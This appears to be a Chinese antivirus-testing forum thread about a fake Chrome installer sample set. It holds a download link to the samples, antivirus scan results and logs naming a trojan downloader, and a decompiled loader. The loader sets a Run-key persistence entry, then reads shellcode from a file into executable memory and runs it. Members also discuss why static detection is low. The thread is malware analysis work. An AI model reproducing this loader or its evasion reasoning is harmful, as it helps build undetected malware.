fake Chrome 3X

post88

https://wormhole.app/D1Qn7J#5NUrWky6azz0cc6XkYgT_Q

avast kill 1

ulyanov2233

这些文件无法使用
发送者在完成上传前离开。您将无法下载文件。请询问发送者重新上传到Wormhole。

post88

ulyanov2233 发表于 2025-9-29 16:10
这些文件无法使用
发送者在完成上传前离开。您将无法下载文件。请询问发送者重新上传到Wormhole。

重新上传了

UNknownOoo

火绒
扫描：未检出

wowocock

UNknownOoo 发表于 2025-9-29 16:31
火绒
扫描：未检出

void __noreturn GetDBVersion()
{
  void (__cdecl *v0)(size_t); // ebx
  _DWORD *v1; // eax
  void (__cdecl *v2)(size_t, size_t); // edi
  wchar_t *v3; // esi
  HANDLE ProcessHeap; // eax
  int v5; // ecx
  unsigned __int16 v6; // ax
  double v7; // xmm0_8
  _DWORD *ThreadLocalStoragePointer; // ecx
  HANDLE FileW; // esi
  unsigned int FileSize; // ebx
  HANDLE v11; // eax
  void *v12; // edi
  HANDLE Thread; // esi
  double Src; // [esp+10h] [ebp-238h]
  void *Srca; // [esp+10h] [ebp-238h]
  _DWORD *v16; // [esp+20h] [ebp-228h]
  HKEY phkResult; // [esp+34h] [ebp-214h] BYREF
  WCHAR Filename[262]; // [esp+38h] [ebp-210h] BYREF

  cosh((double)(rand() % 100));
  if ( *(double *)libm_sse2_pow_precise().m128_u64 < 0.0 )
    libm_sse2_sqrt_precise();
  ++dword_100064C8;
  rand();
  rand();
  _InterlockedIncrement(&dword_100064C8);
  qword_100060A8 = (unsigned __int64)qword_100060A8 >> 1;
  GetModuleFileNameW(0, Filename, 0x104u);
  v0 = (void (__cdecl *)(size_t))malloc;
  v1 = malloc(0x10u);
  v2 = (void (__cdecl *)(size_t, size_t))calloc;
  *v1 = 301;
  v1[1] = 0;
  v1[2] = 0;
  v1[3] = 0;
  calloc(1u, 0x18u);
  InitializeCriticalSection(&CriticalSection);
  if ( !RegOpenKeyExW(HKEY_CURRENT_USER, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, 0x20006u, &phkResult) )
  {
    RegSetValueExW(phkResult, L"MyApplication", 0, 1u, (const BYTE *)Filename, 2 * wcslen(Filename) + 2);
    RegCloseKey(phkResult);
  }
  IsBadReadPtr(Filename, 0x208u);
  ++dword_100060B4;
  v3 = wcsrchr(Filename, 0x5Cu);
  CreateEventW(0, 0, 0, 0);
  if ( v3 )
  {
    ProcessHeap = GetProcessHeap();
    HeapAlloc(ProcessHeap, 0, 0x10u);
    dword_100064D0 = dword_100064D0 == 0;
    v3[1] = 0;
    v5 = 0;
    Src = 0.0;
    v6 = 72;
    do
    {
      ++v5;
      v7 = (double)v6 + Src;
      v6 = word_10003250[v5];
      Src = v7;
    }
    while ( v6 );
    if ( dword_100064DC > *(_DWORD *)(*((_DWORD *)NtCurrentTeb()->ThreadLocalStoragePointer + TlsIndex) + 4) )
    {
      sub_10001512(&dword_100064DC);
      if ( dword_100064DC == -1 )
      {
        dword_100064E0 = GetTickCount();
        _Init_thread_footer(&dword_100064DC);
      }
    }
  }
  wcscat_s(Filename, 0x104u, L"1.txt");
  ThreadLocalStoragePointer = NtCurrentTeb()->ThreadLocalStoragePointer;
  dword_100064C4 = dword_100064C4 == 0;
  v16 = (_DWORD *)(ThreadLocalStoragePointer[TlsIndex] + 4);
  while ( 1 )
  {
    VirtualAlloc(0, 0x1000u, 0x1000u, 4u);
    --dword_100060C0;
    dword_100064CC = ~dword_100064CC;
    CreateSemaphoreW(0, 4, 16, 0);
    --dword_100060BC;
    FileW = CreateFileW(Filename, 0xC0000000, 3u, 0, 3u, 0x20u, 0);
    v0(0x100u);
    _InterlockedDecrement(&dword_100060A0);
    FileSize = GetFileSize(FileW, 0);
    v2(1u, 0x80u);
    _InterlockedDecrement(&dword_100060B8);
    Srca = operator new[](FileSize, (const struct std::nothrow_t *)&unk_10003150);
    InitializeSRWLock(&SRWLock);
    phkResult = 0;
    InitializeConditionVariable(&ConditionVariable);
    ReadFile(FileW, Srca, FileSize, (LPDWORD)&phkResult, 0);
    v11 = GetProcessHeap();
    HeapAlloc(v11, 0, 0x40u);
    _InterlockedDecrement(&dword_100060C4);
    v12 = VirtualAlloc(0, FileSize, 0x1000u, 0x40u);
    malloc(0x20u);
    if ( dword_100064E4 > *v16 )
    {
      sub_10001512(&dword_100064E4);
      if ( dword_100064E4 == -1 )
      {
        CreateSemaphoreW(0, 1, 1, 0);
        _Init_thread_footer(&dword_100064E4);
      }
    }
    memmove(v12, Srca, FileSize);
    calloc(1u, 0x10u);
    --dword_100060B0;
    Thread = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)v12, 0, 0, 0);
    WaitForSingleObject(Thread, 0xFFFFFFFF);
    VirtualAlloc(0, 0x1000u, 0x2000u, 1u);
    CloseHandle(Thread);
    v0 = (void (__cdecl *)(size_t))malloc;
    malloc(0x40u);
    VirtualFree(v12, 0, 0x8000u);
    v2 = (void (__cdecl *)(size_t, size_t))calloc;
    calloc(1u, 8u);
    ++dword_100064D4;
  }
}

tony099

卡巴斯基 OPENTIP
检测出：3X

https://opentip.kaspersky.com/BE ... /results?tab=upload

https://opentip.kaspersky.com/3B ... /results?tab=upload

https://opentip.kaspersky.com/10 ... /results?tab=upload

ulyanov2233

eset解压扫描2x

2025/9/29 16:43:49;文件系统实时防护;文件;C:\Users\Y8219\Downloads\法克chrome3\ChromeSetup.exe;MSIL/TrojanDownloader.Agent.SGI 特洛伊木马 的变量;已通过删除清除;FIREFLY\Y8219;在通过应用程序创建的新文件上发生了事件: C:\Program Files\WinRAR\WinRAR.exe (4B95046B78C08FF2048F9CCD4186BC8BBDC0BFEF).;3386A7EA0D6C3CC4236174689DCEDB19A10C74B0;;;
2025/9/29 16:43:49;文件系统实时防护;文件;C:\Users\Y8219\Downloads\法克chrome3\ChromeSetup-8679.msi;ESET LiveGuard 特洛伊木马;已通过删除清除;FIREFLY\Y8219;在通过应用程序创建的新文件上发生了事件: C:\Program Files\WinRAR\WinRAR.exe (4B95046B78C08FF2048F9CCD4186BC8BBDC0BFEF).;B0F956277BE09B3387D1475F1373B108B25CC4C5;2025/9/29 16:39:15;;

UNknownOoo

wowocock 发表于 2025-9-29 16:34
void __noreturn GetDBVersion()
{
  void (__cdecl *v0)(size_t); // ebx

感觉是很标准的持久化 + 分离加载Shellcode的方法，vt上静态检出率居然这么低...

莒县小哥

wowocock

UNknownOoo 发表于 2025-9-29 16:54
感觉是很标准的持久化 + 分离加载Shellcode的方法，vt上静态检出率居然这么低...

可能危险动作不多，而且只在自己进程里折腾。达不到很多杀软的阈值。